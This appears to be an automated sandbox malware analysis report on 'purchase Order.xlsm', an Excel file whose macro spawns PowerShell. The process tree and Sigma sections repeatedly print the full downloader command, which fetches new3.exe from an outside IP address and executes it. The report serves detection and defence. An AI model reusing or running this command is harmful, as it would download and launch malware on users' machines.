Play interactive tour

Edit tour

Windows Analysis Report purchase Order.xlsm

Overview

General Information

Sample Name:	purchase Order.xlsm
Analysis ID:	510341
MD5:	d1ad5761044b2abb12b78700f1a3a537
SHA1:	7fed2064ae3681227f674608df64ff1d7c45a2ee
SHA256:	8024e6dc8c230782b570a234318ba7b5a72f64ad5a1a3ff81584e080d9338eba
Tags:	xlsm
Infos:
Most interesting Screenshot:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Document exploit detected (process start blacklist hit)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Yara detected Xls With Macro 4.0

Excel documents contains an embedded macro which executes code when the document is opened

Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Creates a process in suspended mode (likely to inject code)

Searches for user specific document files

Contains long sleeps (>= 3 min)

Enables debug privileges

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1708 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

powershell.exe (PID: 1444 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe MD5: 852D67A27E454BD389FA7F02A8CBE23F)

explorer.exe (PID: 2712 cmdline: 'C:\Windows\explorer.exe' C:\Users\Public\eVJOpc.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

explorer.exe (PID: 2416 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 1444	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x2be5ca:$sa2: -encodedCommand 0x2beb87:$sa2: -EncodedCommand 0x2bf2d2:$sa2: -EncodedCommand 0x2bf369:$sa2: -encodedCommand 0x286e3:$sc1: -nop 0x288eb:$sc1: -nop 0x2be982:$sc2: -NoProfile 0x2be9b1:$sd2: -NonInteractive

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, ProcessId: 1444

Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Show sources

Source: Process started

Author: James Pemberton / @4A616D6573: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, ProcessId: 1444

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, ProcessId: 1444

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: purchase Order.xlsm

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: purchase Order.xlsm

Virustotal: Detection: 22%

Perma Link

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdbBBKX source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000002.00000002.430234391.000000000373D000.00000004.00000001.sdmp	String found in binary or memory: http://212.192.2
Source: powershell.exe, 00000002.00000002.430234391.000000000373D000.00000004.00000001.sdmp	String found in binary or memory: http://212.192.241.75/sam/new3.e
Source: powershell.exe, 00000002.00000002.426079549.0000000002D91000.00000004.00000001.sdmp	String found in binary or memory: http://212.192.241.75/sam/new3.exe
Source: powershell.exe, 00000002.00000002.425171182.0000000000220000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.425250143.0000000000444000.00000004.00000040.sdmp, powershell.exe, 00000002.00000002.425295083.0000000001BA6000.00000004.00000001.sdmp	String found in binary or memory: http://212.192.241.75/sam/new3.exe-OutFile$env:public
Source: powershell.exe, 00000002.00000002.425171182.0000000000220000.00000004.00000020.sdmp	String found in binary or memory: http://212.192.241.75/sam/new3.exe1.0a.
Source: powershell.exe, 00000002.00000002.430234391.000000000373D000.00000004.00000001.sdmp	String found in binary or memory: http://212.192.241.75/sam/new3.exePE
Source: powershell.exe, 00000002.00000002.425171182.0000000000220000.00000004.00000020.sdmp	String found in binary or memory: http://212.192.241.75/sam/new3.exeu
Source: explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000002.00000002.425523815.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000002.428542595.0000000001CE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.676730998.0000000001E30000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000002.00000002.425523815.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000002.428542595.0000000001CE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.676730998.0000000001E30000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................=.....#.........j...............=.....................`I.........v.....................K......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#.................'k......................3.............}..v....0.......0.^..............Jy.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.................'k.....My...............3.............}..v............0.^.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.................'k......................3.............}..v....0.......0.^..............Jy.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;.................'k.....My...............3.............}..v............0.^.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;.................'k......................3.............}..v....0.......0.^..............Jy.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G.......s.l.3.,. .T.l.s."...".............3.............}..v............0.^.............XJy.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G.................'k......................3.............}..v............0.^..............Jy.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.8.3.............}..v............0.^.............XJy.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S.................'k......................3.............}..v....H.......0.^..............Jy.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._.................'k.....My...............3.............}..v............0.^.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._.................'k......................3.............}..v....H.......0.^..............Jy.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k.................'k.....My...............3.............}..v..... ......0.^.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k.................'k..... ................3.............}..v....H!......0.^..............Jy.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w.................'k.....My...............3.............}..v.....&......0.^.....................f.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w.................'k....8'................3.............}..v.....'......0.^..............Jy.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................'k.....My...............3.............}..v....`.......0.^.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................'k......................3.............}..v...../......0.^..............Jy.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................'k.....My...............3.............}..v.....4......0.^.....................r.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................'k.....5................3.............}..v.... 6......0.^..............Jy.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .........'k.....My...............3.............}..v.....9......0.^.............XJy.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................'k....h:................3.............}..v.....:......0.^..............Jy.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................0.'k......y...............3.............}..v............0.^.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................'k....H.................3.............}..v............0.^.............(.y.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................0.'k......y...............3.............}..v............0.^.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................'k....H.................3.............}..v............0.^.............(.y.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................0.'k......y...............3.............}..v....0.......0.^.....................~.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................'k......................3.............}..v....h.......0.^.............(.y.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.9.8.3.............}..v....x.......0.^...............y.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................'k....0.................3.............}..v............0.^.............(.y.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................0.'k......y...............3.............}..v....x.......0.^.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................'k....0.................3.............}..v............0.^.............(.y.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................0.'k......y...............3.............}..v....x.......0.^.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................'k......................3.............}..v............0.^.............(.y.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................0.'k......y...............3.............}..v............0.^.....................f.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................'k......................3.............}..v.... .......0.^.............(.y.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................0.'k......y...............3.............}..v............0.^.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................'k......................3.............}..v.... .......0.^.............(.y.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....P"......0.^...............y.....4.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................'k.....#................3.............}..v.....#......0.^.............(.y.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................0.'k......y...............3.............}..v.....(......0.^.....................l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................'k.....)................3.............}..v.....*......0.^.............(.y.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'....... .......0.'k......y...............3.............}..v.....-......0.^...............y.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'.................'k....H.................3.............}..v............0.^.............(.y.............................	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' C:\Users\Public\eVJOpc.exe
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' C:\Users\Public\eVJOpc.exe	Jump to behavior

Source: purchase Order.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: AE430000.0.dr	Initial sample: OLE zip file path = xl/media/image1.png

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
